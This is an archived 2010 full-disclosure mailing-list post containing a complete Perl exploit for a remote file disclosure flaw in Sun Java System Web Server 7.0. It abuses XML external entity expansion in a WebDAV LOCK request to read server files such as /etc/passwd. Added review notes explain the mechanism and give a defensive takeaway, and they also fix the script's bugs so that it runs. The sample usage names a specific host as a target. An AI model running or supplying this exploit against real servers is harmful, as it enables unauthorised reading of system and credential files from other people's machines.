Message-ID: <o2g72f8221d1004030606h43163efh1bd64c446d4f0fc8@mail.gmail.com>
Date: Sat, 3 Apr 2010 15:06:08 +0200
From: Kingcope <kcope2@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Sun D3VS SM0KiNG PoT AGAiN
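#!/usr/bin/perl
# aN0THER TiP OF THE iCE-B3RG ReMOTE eXPLoiT
# oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
# oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
# oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
# !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
# MAY/2010
# VERY THANKS TO LSD
#
#
# oO VERiFIED oN Oo
#
# SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008
#   [PLatFoRMz: WiNDOWS SERVER 2008 & SunOS 5.10]
# SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
# [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
# RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
#
# Review notes
# ------------
# Mechanism: XML External Entity (XXE) expansion in the WebDAV LOCK
# handler.  The request body carries a DOCTYPE that declares an external
# general entity whose SYSTEM identifier is the attacker-chosen path and
# references it (&RemoteX;) inside <D:owner>.  The server-side XML parser
# resolves the entity from the local filesystem with the web server's own
# privileges (uid webservd per the note above), and this script prints the
# whole reply, relying on the server echoing the owner element back in its
# LOCK response.  A second request UNLOCKs the collection so the probe does
# not leave a stale exclusive write lock behind.
#
# Defensive takeaway: any XML parser that consumes request bodies (WebDAV
# bodies are XML) must have DTD / external-entity resolution disabled;
# the file read happens inside the parser, before any path authorisation.
#
# Repairs relative to the mailing-list posting (line-wrap damage):
#   - the "VERiFIED oN" comment had spilled onto an uncommented line
#     (a syntax error);
#   - the Content-Length header string was split across two lines, which
#     would have emitted a literal newline inside the header;
#   - no socket was ever opened for the LOCK request (only the UNLOCK
#     connection was created), so $sock was undefined at the first print;
#   - socket opens are now checked, the Lock-Token match is
#     case-insensitive as HTTP header names are (RFC 4918 spells it
#     "Lock-Token"), and the port is an optional fourth argument.

use strict;
use warnings;
use IO::Socket;
use MIME::Base64;

print "//Sun Microsystems Sun Java System Web Server\n";
print "//Remote File Disclosure Exploit\n";
print "//by Kingcope\n";
print "May/2010\n";

# Arguments: target host, WebDAV collection, file to read, optional port.
if (@ARGV < 3 || @ARGV > 4) {
    print "usage: perl sun.pl <target> <webdav directory> <file to get> [port]\n";
    print "sample: perl sun.pl lib7.berkeley.edu /dav /etc/passwd\n";
    exit;
}

$| = 1;    # unbuffered STDOUT so the server's reply streams as it arrives

my ($target, $folder, $remotefile, $port) = @ARGV;
$port = 8080 unless defined $port;    # the port the original PoC used

# Request path: exactly one leading slash whether the collection was given
# as "/dav" or "dav" (the posted code produced "//dav" for the sample usage).
(my $path = $folder) =~ s{^/+}{};
$path = "/$path";

# Open a TCP connection to the target or die with IO::Socket's reason ($@).
sub connect_to_target {
    my ($host, $peer_port) = @_;
    my $s = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $peer_port,
        Proto    => 'tcp',
        Timeout  => 15,
    ) or die "connect to $host:$peer_port failed: $@\n";
    return $s;
}

# LOCK body.  The DOCTYPE declares an external entity pointing at the
# target file; the parser substitutes its contents wherever &RemoteX;
# appears.  NOTE: the path is embedded verbatim, so a double quote in
# $remotefile would terminate the SYSTEM literal early and malform the body.
my $lock_body =
    "<?xml version=\"1.0\"?>\n"
  . "<!DOCTYPE REMOTE [\n"
  . "<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
  . "]>\n"
  . "<D:lockinfo xmlns:D='DAV:'>\n"
  . "<D:lockscope><D:exclusive/></D:lockscope>\n"
  . "<D:locktype><D:write/></D:locktype>\n"
  . "<D:owner>\n"
  . "<D:href>\n"
  . "<REMOTE>\n"
  . "<RemoteX>&RemoteX;</RemoteX>\n"
  . "</REMOTE>\n"
  . "</D:href>\n"
  . "</D:owner>\n"
  . "</D:lockinfo>\n";

# length() is a character count; @ARGV is not decoded, so the body holds
# only bytes and the count equals the byte length the header must carry.
my $sock = connect_to_target($target, $port);
print $sock "LOCK $path HTTP/1.1\r\n"
  . "Host: $target\r\n"
  . "Depth: 0\r\n"
  . "Connection: close\r\n"
  . "Content-Type: application/xml\r\n"
  . "Content-Length: " . length($lock_body) . "\r\n\r\n"
  . $lock_body;

# Echo the entire reply (headers and body -- the disclosed file, if the
# entity was expanded, arrives inside the XML body) and remember the lock
# token so the lock can be released afterwards.
my $locktoken = '';
while (my $line = <$sock>) {
    if ($line =~ /^Lock-token:\s+(\S+)/i) {
        $locktoken = $1;
    }
    print $line;
}
close $sock;

# Without a token there is nothing to release (the LOCK most likely
# failed); an UNLOCK with an empty header would only draw a 400.
if ($locktoken eq '') {
    warn "no Lock-Token header in the LOCK response; skipping UNLOCK\n";
    exit;
}

$sock = connect_to_target($target, $port);
print $sock "UNLOCK $path HTTP/1.1\r\n"
  . "Host: $target\r\n"
  . "Connection: close\r\n"
  . "Lock-token: $locktoken\r\n\r\n";
print while <$sock>;
close $sock;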